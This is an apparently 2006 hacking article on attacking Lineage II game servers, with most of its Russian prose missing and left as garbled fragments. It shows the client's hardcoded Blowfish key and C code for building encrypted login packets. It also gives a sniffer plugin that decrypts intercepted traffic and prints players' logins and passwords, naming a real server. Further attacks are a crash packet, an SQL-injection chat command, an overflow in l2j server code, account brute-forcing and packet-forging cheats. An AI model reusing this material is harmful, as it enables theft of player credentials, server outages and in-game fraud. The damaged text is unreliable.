// LineAge II: breaking the laws
// publishing date: 17.07.06
// darkgrey / d4rk@securitylab.ru
// m00.blackhat.ru

I. 

II. Login-

    1.  
    2.  
    3.  RequestAuthLogin-  

III. Game-.

    1.    
    2.  
    3. 
    4. xID  ObjectID
    5.  :
         a) /
         b) 
         c) OID  IID
         d)   NPC    

IV.      

    1.    -  
    2.  
    3.    lineage2 
    4.  "" login-
    5. 
    6.  ""   
    7. 
    8. 'remote DoS'    
    9. integer overflow    l2j
    10. SQL-injection
    11.  (   100%- enchant')
    12.  (  )
    13.   SocialAction (0x1b)
    14.   Ride (0x6a)
    15.    
    16.   RequestRestartPoint (    )
    17.       ,   -   ?
    18. 

V.   

VI.    4

VII. 

VIII. 

IX.   



I. .

   lineage?     (?)  - MMORPG
(Massively Multiplayer Online Role-Playing Game).       
  ,    =). ,     
, ..    ""  lineage, , ,
    www.lineageii.ru (    
10 000 )   www.lineage2.com (  100 000,  ,   )
 ,     .
    ,  (     RPG)       
 ,     , , , .  ,   
            .  ,
       ,       -
       (,   lineage   ).
   online (    online) , lineage  
.     ,  -   
     .
      . -,    .  
 ,   ,     . -,
 ,  ,        
  ,      (     ).  
 ,  , ,     ,  
     .    
  ,          ,
       lineage.   ,    
 ( ),        
 300$ (  www.antaras.ru)  5 000$   .  -
        . ,  
N-     ,    1     .
     .
 ,  -    )   ,  . 
,    (      ,  
)    -   -   . -  ,
-    ,    ,  .
  ,       ,       
 (    ),        ,
        .   ?
 , ,   (   bugtraq)  
   lineage. ,    ,   
  . 
 ,       -   
 Half-Life (www.securitylab.ru/analytics/216301.php).    
       ,      .    
      lineage2,    
,      (    ),  
  ,           
,       =)

.
1.  ,        half-life,   
   .     .
2.          
 "" lineage2  l2j,   . ,  100%
  l2j,    ,  l2j    =)
3.     linux.     blowfish.   openssl
package     .
4.    .  ,   ,    
 ,     .     ,   
   .
5.  .        ( )  
     4  lineage2      .
 4     .


II. Login-.

.
  ,   lineage2     ,   
       .  ,    
 (,    3  lineage     )   
  .  ,   ,      =)
      ,        ,
  -  ,      .  ,     
    ,          
  .

1.  . 
  ,  login-   , lineage  blowfish.
,   ,       1993 .  blowfish  ,
    .  - ,    1 
,   / .      blowfish,   
   18 32-   4   256 32-  .
,   , / . 
  - ,  blowfish    ( 8 ).    ,
     ,    -  .
  lineage,  ,  ,     ,
       l2j (    99% 
lineage,  ,         - .  
).    ,   2    ___.
,  ,  ,  .  .

2.  .
    (,   )     (   halflife).
        . -  :
0x00 - RequestAuthLogin (   -    )
0x02 - RequestServerLogin (    )
0x05 - RequestServerList (   )
     ,     .   
  :
0x01 -   
0x03 -   
0x04 -   RequestServerLogin
0x06 -   RequestServerList
       ,     -   .
      . ,   
      0x01,      , 
    (  : 0x03 -    , 0x07 - - 
 , 0x11 -   ).          .
,  RequestAuthLogin      .
  -  ,     ,   , 
 . , ,  "RequestAuthLogin"      .
    8  .     ,   
,        .       ?
    32- .  XOR'  .   
XOR'      .      .

3.    
,     ,     ,  
 .

/*

 la2-example.c ~ LineAge2 c3 RequestAuthLogin packet constructor
 
 Helps to understand lineage2 authentification.
 
 darkgrey / m00.blackhat.ru

 ~broken
*/

#include "/usr/local/include/blowfish.h"

//  
#define KEY_LEN 20
//  RequestAuthLogin     AUTH_PKT_LEN + 2
#define AUTH_PKT_LEN 0x30

// ,     sub-keys ()
char key[] = "[;'.]94-31==-&%@!^+]";

//  bfkey,      
// 18 P   4 S 
BF_KEY bfkey;

// ,        
int add_ckecksum(char *raw, int count) {
	long chksum = 0L;
	int i = 0;
	long ecx;
	for(i = 0; i < count; i += 4) {
		ecx = raw[i];
		ecx |= raw[i + 1];
		ecx |= raw[i + 2];
		ecx |= raw[i + 3];
		chksum ^= ecx;
	}
	
	printf("checksum: 0x%x\n",chksum);
	memcpy(raw+count, (char *)&chksum, 4);
}

//       (   
//   )
int add_lp(char *raw, char *l, char *p) {
	l[15] = '\0';
	p[17] = '\0';

	memcpy(raw+3,l,strlen(l));
	memcpy(raw+17,p,strlen(p));
}

//        ( )
int print_packet(char *raw, int len) {
	int i, c = 0;
	
	for(i=0;i<54;i++) printf("_");
	
	for(i=0;i<len+2;i++) {
		if((c % 0x10)==0) printf("\n0x%.2x | ", c);
		printf("%.2x ",raw[i] & 0xFF);
		c++;
		
	}
	printf("\n\n");
}

//  ,   
int build_auth_packet(char *login, char *pwd) {
	int count = AUTH_PKT_LEN / 8;
	int i;
	char packet_skeleton[] =
		//   RequestAuthLogin
		"\x32\x00" //      0x30 + 0x02
		"\x00" //   (0x00 - RequestAuthLogin)
		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" // login
		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" // password
		"\x08" //    login/password
		"\x00\x00\x00\x00\x00\x00\x00\x00" //  c3   (?)
		"\x00\x00\x00\x00" // 
		"\x00\x00\x00\x00"; 
	
	//      
	add_lp(packet_skeleton, login, pwd);

	//    
	add_ckecksum(packet_skeleton + 2, AUTH_PKT_LEN - 8);
	
	printf("Auth packet dump (non-crypted):\n");
	print_packet(packet_skeleton, AUTH_PKT_LEN);

	//    8 
        for(i = 0; i < count; i++)
		BF_encrypt((BF_LONG *)((short*)&packet_skeleton+1+i*4), &bfkey, BF_ENCRYPT);
	
	printf("Auth packet dump (encrypted):\n");
	print_packet(packet_skeleton,AUTH_PKT_LEN);
}



int main() {
	char login[] = "m00", //  
		pwd[] = "ownzu"; // 
	
	printf("\nla2-example.c ~ LineAge2 c3 RequestAuthLogin packet constructor\n\n");

	//  sub-keys
	BF_set_key(&bfkey, KEY_LEN, key);

	//  
	build_auth_packet(login, pwd);
}
/* eof */

        :

bash-2.05b$ ./a.out

la2-example.c ~ LineAge2 c3 RequestAuthLogin packet constructor

checksum: 0x224a0377
Auth packet dump (non-crypted):
______________________________________________________
0x00 | 32 00 00 6d 30 30 00 00 00 00 00 00 00 00 00 00
0x10 | 00 6f 77 6e 7a 75 00 00 00 00 00 00 00 00 00 00
0x20 | 00 08 00 00 00 00 00 00 00 00 77 03 4a 22 00 00
0x30 | 00 00

Auth packet dump (encrypted):
______________________________________________________
0x00 | 32 00 09 d9 97 e2 29 89 8c b5 1a a0 1a 83 74 43
0x10 | 39 fc 2f 03 c3 26 9c 65 b0 c4 20 28 11 c1 6a 95
0x20 | 3e 44 45 46 2a ae b9 18 91 2e 75 56 d0 dc 40 b5
0x30 | 77 2a

bash-2.05b$


III. Game-

1.    login-    game-.
       .
1)          11  (     ).
2)    RequestAuthLogin 
3)   ,     32-     (  ) - 
  SessionKey #1.
4)   RequestServerList,       ,  ,
,   ,   .
5)   RequestServerLogin,      AccessLevel (   -1,   )
     , ,    ,  
32- SessionKey #2,       game-.
     ,    (       )
 - ,   .
6)   ,    .     (  3   ,
 ),     12-  ,   4  , 
   4-  ( )   64-  .   
       .  ,   
() ,       .
7)       (   ),     
 login-.     .
 ,  7      =) ,  .
,  -    :        ?  
 .     .


2.  
    ,     lineage  64- . 
 4       game-,  -.   N- 
  , XOR'  N-  .    XOR' (N-1)- 
    0xFF.       " ".
         .  ,   
  ,   .   ,        
    ,    ,     
.   ,  .        .
   ,     .     ,
  4-     .  ,    ( 
   ) ,         game-,
    .       ,    .
 ,      ~423 .   
,     - 10 000    ( 
 )      12 .         
 .
     ? ,  ,   . ,  
 TCP (   UDP      halflife),   -  ""  
 .



3. .
    login-,      .     .
  ,    3  lineage2 (  ):
//  login-
0x01 loginfail2 
0x02 accountKicked1 
0x03 loginok 
0x04 serverlist 
0x05 serverfail 
0x06 playfail 
0x07 playok 
0x08 accountKicked 
0x09 blockedAccMsg  //  
0x20 protocol version different 
0x00 VersionCheck 

//  game-
0x01 MoveToLocation  
0x02 NpcSay 
0x03 CharInfo //     
0x04 UserInfo 
0x06 Attack 
0x07 Attack 
0x08 Attacked 
0x09 Attacked 
0x0a AttackCanceld 
0x0b Die 
0x0c Revive 
0x0d AttackOutOfRange 
0x0e AttackInCoolTime 
0x0f AttackDeadTarget
0x10 LeaveWorld 
0x11 AuthLoginSuccess
0x12 AuthLoginFail
0x13 CharList //  
0x15 SpawnItem //   3    
0x16 DropItem //   3    
0x17 GetItem 
0x18 EquipItem 
0x19 UnequipItem 
0x1a StatusUpdate 
0x1b NpcHtmlMessage //   3     ItemID   ObjectID
0x1c SellList 
0x1d BuyList 
0x1e DeleteObject 
0x1f CharSelectInfo
0x20 LoginFail 
0x21 CharSelected
0x22 NpcInfo 
0x23 NewCharacterSuccessPacket 
0x24 NewCharacterFailPacket 
0x25 CharCreateOk 
0x26 CharCreateFail 
0x27 ItemList 
0x28 SunRise 
0x29 SunSet 
0x2a EquipItemSuccess // 
0x2b EquipItemFail // 
0x2c UnEquipItemSuccess // 
0x2d UnEquipItemFail // 
0x2e TradeStart 
0x2f TradeStartOk // 
0x30 TradeOwnAdd 
0x31 TradeOtherAdd 
0x32 TradeDone 
0x33 CharDeleteSuccess 
0x34 CharDeleteFail 
0x35 ActionFail 
0x36 ServerClose 
0x37 InventoryUpdate 
0x38 TeleportToLocation 
0x39 TargetSelected 
0x3a TargetUnselected 
0x3b AutoAttackStart 
0x3c AutoAttackStop 
0x3d SocialAction 
0x3e ChangeMoveType 
0x3f ChangeWaitType 
0x40 NetworkFail // 
0x43 CreatePledge 
0x44 AskJoinPledge 
0x45 JoinPledge 
0x46 WithdrawalPledge 
0x47 OustPledgeMember 
0x48 SetOutPledgeMember 
0x49 DismissPledge 
0x4a SetDismissPledge 
0x4b AskJoinParty 
0x4c JoinParty 
0x4d WithdrawalParty 
0x4e OustPartyMember 
0x4f SetOustPartyMember 
0x50 DismissParty 
0x51 SetDismissParty 
0x52 MagicAndSkillList 
0x53 WarehouseDepositList 
0x54 WarehouseWithdrawalList 
0x55 WarehouseDone 
0x56 ShortCutRegister 
0x57 ShortCutInit 
0x58 ShortCutDelete 
0x59 StopMove 
0x5a MagicSkillUser 
0x5b MagicSkillCanceld 
0x5d CreatureSay 
0x5e EquipUpdate 
0x5f StopMoveWithLocation 
0x60 DoorInfo 
0x61 DoorStatusUpdate 
0x63 PartySmallWindowAll 
0x64 PartySmallWindowAdd 
0x65 PartySmallWindowDeleteAll 
0x66 PartySmallWindowDelete 
0x67 PartySmallWindowUpdate 
0x68 PledgeShowMemberListAll 
0x69 PledgeShowMemberListUpdate 
0x6a PledgeShowMemberListAdd 
0x6b PledgeShowMemberListDelete 
0x6c MagicList // 
0x6d SkillList 
0x6e VehicleInfo 
0x6f VehicleDeparture 
0x70 VehicleCheckLocation 
0x71 GetOnVehicle 
0x72 GetOffVehicle 
0x73 TradeRequest 
0x74 RestartResponse 
0x75 MoveToPawn 
0x76 SetTo 
0x77 StartRotating 
0x78 FinishRotating 
0x79 MoveBackwardToLocation //     to_the_nearest_village  
0x7a SystemMessage 
0x7d StartPledgeWar 
0x7e ReplyStartPledgeWar 
0x7f StopPledgeWar 
0x80 ReplyStopPledgeWar 
0x81 SurrenderPledgeWar 
0x82 ReplySurrenderPledgeWar 
0x83 SetPledgeCrest // 
0x84 PledgeCrest 
0x85 SetupGauge 
0x86 ShowBoard 
0x87 ChooseInventoryItem 
0x89 MoveToLocationInVehicle 
0x8a StopMoveInVehicle 
0x8b ValidateLocationInVehicle 
0x8c TradeOtherAdd2 
0x8d TradePressOwnOK // 
0x8e MagicSkillLaunched 
0x8f FriendAddRequestResult 
0x90 FriendAdd  // 
0x91 FriendRemove // 
0x92 FriendList // 
0x93 FriendStatus // 
0x94 TradePressOtherOk // 
0x95 FriendAddRequestResult2 
0x96 LeaveWorld2 
0x97 AbnormalStatusUpdate 
0x98 QuestList 
0x99 EnchantResult 
0x9a AuthServerList // 
0x9b PledgeShowMemberListDeleteAll 
0x9c PledgeInfo 
0x9d PledgeExtendedInfo 
0x9e SurrenderPersonally 
0x9f Ride 
0xa1 PledgeShowInfoUpdate 
0xa2 ClientAction 
0xa3 AquireSkillList 
0xa4 AquireSkillInfo 
0xa5 ServerObjectInfo 
0xa6 HideGm 
0xa7 AquireSkillDone 
0xa8 GMViewCharacterInfo 
0xa9 GMViewPledgeInfo 
0xaa GMViewSkillInfo 
0xab GMviewMagicInfo 
0xac GMViewQuestInfo 
0xad GMViewItemList 
0xae GMViewWarehouseWithdrawList 
0xaf PartyMatchList 
0xb0 PartyMatchDetail 
0xb1 PlaySound 
0xb2 StaticObject 
0xb3 PrivateSellList2 
0xb4 PrivateBuyList2 
0xb5 PrivateStoreMsg 
0xb6 ShowMinimapPacket 
0xb7 ReviveRequest // 
0xb8 AbnormalVisualEffect 
0xb9 TutorialShowHtml 
0xba TutorialShowQuestionMark 
0xbb TutorialEnableClientEvent 
0xbc TutorialClose 
0xbd ShowRadar 
0xbe DeleteRadar 
0xbf MyTargetSelected 
0xc0 PartyMemberPosition 
0xc1 AskJoinAlliance 
0xc2 JoinAlliance 
0xc3 WithdrawAlliance 
0xc4 OustAllianceMemberPledge 
0xc5 DismissAlliance 
0xc6 SetAllianceCrest // 
0xc7 ReceiveAllyCrest 
0xc8 ServerCloseSocket // 
0xc9 PetStatusShow 
0xca PetInfo 
0xcb PetItemList 
0xcc PetInventoryUpdate 
0xcd AllianceInfo // 
0xce PetStatusUpdate 
0xcf PetDelete 
0xd0 PrivateSellList 
0xd1 PrivateBuyList 
0xd2 PrivateStoreMsg 
0xd3 VehicleStart 
0xd4 RequestTimeCheck 
0xd5 StartAllianceWar 
0xd6 ReplyStartAllianceWar // 
0xd7 StopAllianceWar 
0xd8 ReplyStopAllianceWar //  
0xd9 SurrenderAllianceWar // 
0xda SkillCoolTimePacket 
0xdb PackageToListPacket 
0xdc PackageSendableListPacket 
0xdd EarthQuake 
0xde FlyToLocation 
0xdf BlockList // 
0xe0 SpecialCamera 
0xe1 NormalCamera 
0xe2 CastleSiegeInfoPacket 
0xe3 CastleSiegeAttackerList 
0xe4 CastleSiegeDefenderList 
0xe5 NickNameChanged 
0xe6 PledgeStatusChanged 
0xe7 RelationChanged 
0xe8 OnEventTrigger 
0xe9 MultiSellListPacket 
0xea SetSummonRemainTime 
0xeb OnSkillRemainSec 
0xec NetPingPacket 

  :
0x01 MoveBackwardToLocation 
0x02 Say 
0x03 EnterWorld 
0x04 Action 
0x08 RequestAuthLogin
0x09 Logout 
0x0a Attack 
0x0b CharacterCreate
0x0c CharacterDelete
0x0d CharacterSelect
0x0e NewCharacter 
0x0f ItemList 
0x10 RequestEquipItem 
0x11 RequestUnEquipItem 
0x12 RequestDropItem 
0x12 RequestDropItemFromPet 
0x14 UseItem 
0x15 TradeRequest 
0x16 AddTradeItem 
0x17 TradeDone 
0x1a RequestTeleport 
0x1b SocialAction 
0x1c ChangeMoveType // .   'RequestActionUse' 
0x1d ChangeWaitType // .   'RequestActionUse' 
0x1e RequestSellItem 
0x1f RequestBuyItem 
0x20 RequestLinkHtml 
0x21 RequestBypassToServer 
0x22 RequestBBSwrite 
0x23 RequestCreatePledge 
0x24 RequestJoinPledge 
0x25 RequestAnswerJoinPledge 
0x26 RequestWithDrawalPledge 
0x27 RequestOustPledgeMember 
0x28 RequestDismissPledge 
0x29 RequestJoinParty 
0x2a RequestAnswerJoinParty 
0x2b RequestWithDrawalParty 
0x2c RequestOustPartyMember 
0x2d RequestDismissParty 
0x2e RequestMagicSkillList 
0x2f RequestMagicSkillUse 
0x30 Appearing 
0x31 SendWareHouseDepositList 
0x32 SendWareHouseWithDrawList 
0x33 RequestShortCutReg 
0x34 RequestShortCutUse 
0x35 RequestShortCutDel 
0x37 RequestTargetCancel 
0x38 Say2 //  (   - la2.ru -  0x39)
0x3c RequestPledgeMemberList 
0x3e RequestMagicList 
0x3f RequestSkillList 
0x41 MoveWithDelta 
0x42 GetOnVehicle 
0x43 GetOffVehicle 
0x44 AnswerTradeRequest 
0x45 RequestActionUse 
0x46 RequestRestart 
0x47 RequestSiegeInfo 
0x48 ValidatePosition 
0x49 RequestSEKCustom 
0x4a StartRotating 
0x4b FinishRotating 
0x4d RequestStartPledgeWar 
0x4e RequestReplyStartPledgeWar 
0x4f RequestStopPledgeWar 
0x50 RequestReplyStopPledgeWar 
0x51 RequestSurrenderPledgeWar 
0x52 RequestReplySurrenderPledgeWar 
0x53 RequestSetPledgeCrest 
0x55 RequestGiveNickName  //      CL'.    ..
0x57 RequestShowboard 
0x58 RequestEnchantItem 
0x59 RequestDestroyItem 
0x5b SendBypassBuildCmd 
0x5e RequestFriendInvite 
0x5f RequestFriendAddReply 
0x60 RequestFriendList 
0x61 RequestFriendDel 
0x62 CharacterRestore 
0x63 RequestQuestList 
0x64 RequestDestroyQuest 
0x66 RequestPledgeInfo 
0x67 RequestPledgeExtendedInfo 
0x68 RequestPledgeCrest 
0x69 RequestSurrenderPersonally 
0x6a Ride 
0x6b RequestAcquireSkillInfo 
0x6c RequestAcquireSkill 
0x6d RequestRestartPoint 
0x6e RequestGMCommand 
0x6f RequestPartyMatchConfig 
0x70 RequestPartyMatchList 
0x71 RequestPartyMatchDetail 
0x72 RequestCrystallizeItem 
0x73 RequestPrivateStoreManage 
0x74 SetPrivateStoreList 
0x75 RequestPrivateStoreManageCancel 
0x76 RequestPrivateStoreQuit 
0x77 SetPrivateStoreMsg 
0x78 RequestPrivateStoreList 
0x79 SendPrivateStoreBuyList 
0x7a ReviveReply 
0x7b RequestTutorialLinkHtml 
0x7c RequestTutorialPassCmdToServer 
0x7d RequestTutorialQuestionMark 
0x7e RequestTutorialClientEvent 
0x7f RequestPetition 
0x80 RequestPetitionCancel 
0x81 RequestGMList 
0x82 RequestJoinAlly 
0x83 RequestAnswerJoinAlly 
0x84 RequestWithdrawAlly 
0x85 RequestOustAlly 
0x86 RequestDismissAlly 
0x87 RequestSetAllyCrest 
0x88 RequestAllyCrest 
0x89 RequestChangePetName 
0x8a RequestPetUseItem 
0x8b RequestGiveItemToPet 
0x8c RequestGetItemFromPet 
0x8e RequestAllyInfo 
0x8f RequestPetGetItem 
0x90 RequestPrivateStoreBuyManage 
0x91 SetPrivateBuyList 
0x92 RequestPrivateStoreBuyManageCancel 
0x93 RequestPrivateStoreBuyQuit 
0x94 SetPrivateBuyMsg 
0x95 RequestPrivateStoreBuyList 
0x96 SendPrivateStoreBuyBuyList 
0x97 SendTimeCheckPacket 
0x98 RequestStartAllianceWar 
0x99 ReplyStartAllianceWar 
0x9a RequestStopAllianceWar 
0x9b ReplyStopAllianceWar 
0x9c RequestSurrenderAllianceWar 
0x9d RequestSkillCoolTime 
0x9e RequestPackageSendableItemList 
0x9f RequestPackageSend 
0xa0 RequestBlock 
0xa1 RequestCastleSiegeInfo 
0xa2 RequestCastleSiegeAttackerList 
0xa3 RequestCastleSiegeInfo 
0xa4 RequestJoinCastleSiege 
0xa5 RequestConfirmCastleSiegeWaitingList 
0xa6 RequestSetCastleSiegeTime 
0xa7 RequestMultiSellChoose 
0xa8 NetPing


 ,       Request,    "".
, ,      :      ,
 //npc  .  ,  -  (,   )  "". 
 .


4. XID  ObjectID
  (, NPC)     16/32-  ( - 8- ).
   , , ,     2/4-  ,   -  :
"Crystal Scroll: Enchant Weapon (Grade B)"   NPC  "Magister MacTePqpJlOMaCTeP".   , 
      .       NPC/
     ,       .  ,    
 ,      -    ,      .

     32-  Object ID.     ,  
  ,    ,   OID.  OID     
OID  -1.   OID    ,   .  , OID
,        .  , , 
 ,      .     ,  
   ( 0xFFFFFFFF  0x00000000)   ,    OID  
 ,      (     ).
   ,   OID    :)     ,   OID
~4.3  ,    ,      -  -  
(   ).   ,  - .    ,  , , 
  la2  ( )    .      ?
  , OID     .     .
  NPC, OID       ,    NPC  .  OID    .


5.  .

a)  
 ,     ,    3- .
 0x94 (SetPrivateBuyMsg).        ,  
        (,    ).  :

// SetPrivateStoreBuyMsg 
XX XX   //  
94      //  
41 00 41 00 41 00 42 00 42 00 42 00 // .       null-.
00 00   //  

    0x91 (SetPrivateBuyList).       ,Item ID
 . :

// SetPrivateStoreList 
XX XX        //  
91           //  
01 00 00 00  //  
//  
e1 02 00 00  // Item ID
00 00
01 00 00 00  //     
e8 03 00 00  // 
//  

   .      1   IID 0x2e1 (Scroll of Resurrection)  1000 .
    0x1d.    :

XX XX       //  
1d          // 
01 00 00 00 // - 

  ,       .   'SetPrivateBuyMsg' 
'SetPrivateStoreMsg',   'SetPrivateBuyList' - 'SetPrivateStoreList' .
,   ,  Item ID  Object ID,     -  .


b)  
   .

XX XX       //  
38          //   (Say2)
42 00 42 00 42 00 42 //  (BBBB)
00 00 00 02 00 00 00 //  =)
41 00 41 00 41 00 41 //  ()
00 00 00    // 


c)          ,    . ,  
    Item ID  Object ID.

XX XX //  

1b //   (0x1b  antaras.ru)
00 00 

05 00 //  

04 00       //  
1e 26 14 40 // Object ID
d4 15 00 00 // Item ID (0x15d4 - Tutorial Guide)
01 00 00 00 // 
05 00 00 00 00 00 00 00 00 00 00 00 00 00 // ,  ,      -

01 00       //  
1d 26 14 40 // Object ID
7b 04 00 00 // Item ID (0x47b - Squire's pants)
01 00 00 00 // 
01 00 00 00 00 00 00 08 00 00 00 00 00 00 

01 00       //  
1c 26 14 40 // Object ID
7a 04 00 00 // Item ID (0x47a - Squire's Shirt)
01 00 00 00 // 
01 00 00 00 00 00 00 04 00 00 00 00 00 00 

00 00       //  
1b 26 14 40 // Object ID
0a 00 00 00 // Item ID (0x0a - dagger)
01 00 00 00 // 
00 00 00 00 00 00 80 00 00 00 00 00 00 00 

00 00       //  
1a 26 14 40 // Object ID
42 09 00 00 // Item ID (0x942 - Guild Member's Club)
01 00 00 00 // 
00 00 00 00 00 00 80 00 00 00 00 00 00 00 


d)   NPC    
 ,    NPC     :

04 //   (Action)
51 14 10 48 // OID NPC
//    __ 
c6 51 01 00 // X
52 45 02 00 // Y
b8 f2 ff ff // Z
00 // 

     -  NPC.     ,    
 .
,           "Learn skills",    
 :

21 //   (RequestBypassToServer)
6c 00 65 00 61 00 72 00 6e 00 5f 00 73 00 6b 00 69 00 6c 00 6c 00 00 // learn_skill
00 // 

    ,          :

6b //   (RequestAcquireSkillInfo)
10 00 00 00 //  
09 00 00 00 // 

   ,     ,    0x63 (RequestAcquireSkill)



IV.      

1.    -  
           .   
   ,      .      
  .
   www.antaras.ru - ,   lineage2 C1OFF 
(   3).     (  non-blocking sockets),  
 ,    (   )  , 
  ,        'http://antharas.ru/?id=2'.
      123456789, 0987654321 ( antaras.ru  
 8  -    -),   ,    
 , ~1500 .      ,  
  . ,      50 . ,  ,  
   ,     .    ...
 ,   ,  ,    1   ()
  400$ ,    -   . ,  ,  
"",  " ". ,   ,       ,  
     ;)   .

 3       .
-,        ,      
,       ,  -  :/   
   ,      . ,    ,  ,
,         ,     ,   
   ,        (  - )  .
  ,      ,   .
-,  != .     ,    ,  
  .           "" ,  
      NICKNAME  LOGINNAME,    -  
NICKNAME      NICKNAME   ,      
 .
-,       ,       
,    .   ?     , , 
,  , :
  ,   ,   .       ,
       -      -     .  
,   ""        
   .
 ,    ,         , 
      ,       .  
    ,          ,  
  .  ..   ,     ,   
 ,      ,    ,
      .
,      Lineage2 ,     ...
       - la2brute.5bb.ru.
 ,      ,       .
 ,      (-   2006-),     
  30-50   ,      4-5  .
 ,  ,   ,  -   ,  la2.abyss.ru.
   ,   antaras.ru   -    5   40-
  .     ,     ,  
 .



2.  
    , ,        , .
  ,      P  S   Blowfish  
521 .        ,     
 .    ,  l2j   !    , l2j  
  !   ,    (        ),  l2j
,       .
    ,           ,
   .         blowfish'?

    sniffit  0.3.7.beta,      , 
     /  lineage2 . 

====> la2_plugin.plug <====
/*

 Sniffit 0.3.7.beta LineAge2 c3 plugin
 Allows to catch and decode la2 RequestAuthLogin packets *on the fly*
 and dump login/passwords.
 
 by darkgrey / m00.blackhat.ru

 ~broken
*/

#include "/usr/local/include/blowfish.h"
#define KEY_LEN 20

BF_KEY bfkey;

char key[] = "[;'.]94-31==-&%@!^+]";

void init_la2_plugin() {
	
	printf("LineAge2 C3 plugin enabled\n\n");
	BF_set_key(&bfkey, KEY_LEN, key);
	
}

void PL_la2_plugin (struct Plugin_data *PLD) {
	int i = 0;
	int count = (PLD->PL_info.DATA_len - 2) / 8;
	char *ptr = PLD->PL_data;
	unsigned char *ls_ip;
	
	if(PLD->PL_info.DATA_len == 0x32 && PLD->PL_info.UDP_len == 0) {
		ls_ip=(unsigned char *)&(PLD->PL_iphead.destination);
		printf("Login Server ip: %u.%u.%u.%u\n",ls_ip[0],ls_ip[1],ls_ip[2],ls_ip[3]);
		
		for(i = 0; i < count; i++)
			BF_encrypt((BF_LONG *)((short*)ptr+1+i*4), &bfkey, BF_DECRYPT);
			
		i = 2; printf("Login: ");
		while(PLD->PL_data[i++] != '\x00' || i != 16)
			printf("%c",PLD->PL_data[i]);
		
		printf("\nPassword: ");
		while(PLD->PL_data[i++] != '\x00' || PLD->PL_data[i] != '\x08')
			printf("%c",PLD->PL_data[i]);

		printf("\n");
	}
}
/* eof */

====> sn_plugins.h <====
#define PLUGIN2_NAME 	"LineAge2 c3 Plugin"
#define PLUGIN2(x)	PL_la2_plugin(x)
#define PLUGIN2_INIT() init_la2_plugin()
#include "la2_plugin.plug"
/* eof */

 ,   ,         sniffit.   
       blowfish     make-.
m00.blackhat.ru/m00-la2sniff.jpg -      lineage2 
   sniffit      www.antaras.ru (217.107.212.212 -
 -).


3.    lineage2 
  ,   8    -   ? ,  
 4 :>       ,   lineage   -
 .  l2j ,     true  false,
 -    .  ,  l2j   .
,  ,  ,  ,  l2j.


4.  "" login-
 ,     ,   /    0x03
( ,    ).       .
    10-  3 ,       , 
  0x01 (  ),   www.la2.ru  0x03    
   (,     "-").
  ,    la2.ru,   -  -
    tcp-.
           .


5. 
          1  2,    
   .
   ,  ,   login- 1    ,  
 game-        . ,   
         .
        IID  OID.
   WH,      ,      , ..
       .


6.  ""   
  .       ( )  hint.
 ,    ,  lineage   .      
 (  ).            ().
       .    ,     .
      :
0B //  
45 00 6D 00 30 00 30 00 00 00 //  
04 00 00 00 // 
00 00 00 00 // 
35 00 00 00 //   ()
14 00 00 00 // 6  ,   ,   
27 00 00 00 //
2D 00 00 00 //
1B 00 00 00 //
1D 00 00 00 //
0A 00 00 00 //
00 00 00 00 //  
00 00 00 00 //  
00 00 00 00 //  
       "m00"  . 
,   ( )       .   
        (    =)). , , , 
           ,     .  
        (      :)),  ,   ,
  ,     .
  ,      NPC         . 
,        NPC  .  , ,   ,  
 "Spoil"  NPC .    ,         ?
  ,        (   ""),    
  .  ,   ,    20-    -,
    "Elven Knight" (   ).
      .
 ,       .
 ,    ,   2    . LA2        
    .  ,  ,   5-  human fighter'   
mortal blow   ( ,   SP).      .
  ,   l2j  -   .       
,    GM-.


7. .
       ,    - god mode.
,  ,    1000 ,   -   =)
 ,   ?      ,     :
   .
  ,     0 HP   ,     (    :) -
  ).   ,      0 HP,        HP  ?
     0 HP.  la2   :      "return to the nearest village"
     l2.exe,       0 HP     (    ).
   ,   RequestRestartPoint-     Apearing,  
     HP   .      ,   
  .
,      "" 0?   ,    HP     float
(  ,       ).  ,     
HP  0   bleed  poison,      0,   HP  ,   .
     0 -  .
,  0 HP  ,    ,     . 
1)        - (     ).  ,
  ,         ,     HP/MP. ,
    - ,   .     .
2)       -. ,     , 
 human'   .   ,       human mage,  
 human fighter,    .
        :
	a)         .
	b)   ,  HP   ,       .
3)  , ,  -        hint.
  ,       .     65%+,    
,   .    ,     90%+,   ,     ,  
  HP!     , ,     ,      ?
    !   ,        ,  HP   
!        -    (reborn.ru - C4)  
  .     ,      blazing skin/freazing skin.
4)       -  demon's set.             
.    ,             .

       .      
  -   HP -   lvlup'   heal'.     bleed, poison,
 .

     "fake death".      FD          
     .   ,  .


8. 'remote DoS'    
      ,      ""   
 . LA2      (  - -     
,      ),      .  ,  
( )  game-,   "  ".   ?  , ,
 ? !  ? !!      ? !!!
 ,    ,     resp time (fairy queen timinel - 
5 , )     . ,  ,  ,  
.       5   3- .
   ?
 l2j 100%   -  .
72 // RequestCrystallizeItem
00 00 00 00 // OID 
FF FF FF FF // 
     OID   .     .
    .     ,   . ? 
  ,         (   ,  
).       ,    ,    
 .


9. integer overflow    l2j
  ,      ,   lineage2   ,
      l2j    
:
public void run()
{
    _log.fine("loginserver thread[C] started");
    int lengthHi = 0;
    int lengthLo = 0;
    int length = 0;
    boolean checksumOk = false;
    int sessionKey = -1;
    String account = null;
    String gameServerIp = null;
    try
    {
        InetAddress adr = InetAddress.getByName(_gameServerHost);
        gameServerIp = adr.getHostAddress();
        Init startPacket = new Init();
        _out.write(startPacket.getLength() & 0xff);
        _out.write(startPacket.getLength() >> 8 & 0xff);
        _out.write(startPacket.getContent());
        _out.flush();
        do
        {
            lengthLo = _in.read();
            lengthHi = _in.read();
            length = lengthHi * 256 + lengthLo;
            if(lengthHi < 0)
            {
                _log.warning("Client terminated the connection.");
                break;
            }
            byte incoming[] = new byte[length];
            incoming[0] = (byte)lengthLo;
            incoming[1] = (byte)lengthHi;
.................
    'integer overflow'     ,
     -  (off-by-two overflow),    ...
    2   l2walker'.  ,  100%  .
     ,    ,     .
 ,  L2J       .       .


10. SQL-injection
,       , ,     -   unicode- 
iis.    ,   ,      lineage.      ,
  ,    la2- (   ,   ,    )  
   sql-. ,  : /block 'SHUTDOWN--    sql-.
   ,  ,    ,       
"SHUTDOWN--"    ,    -     ,   
  .
        ,   , ,    ,  
  .  ,      :)


11. 
 ,           "".
   ?   ,        , 
 .       .  +3   ,   .
,    "" ,      (,  ,   ).
      ""       .
 ,  -  -     +6,   ... !     
 ,    100%  .   ,    1   1- , 
 ,      "",   (,  INT   
 ),   ,  soulshots,     ,   
      . , ,      ,      
,    ,    -  100%        .
,       .     ?     .
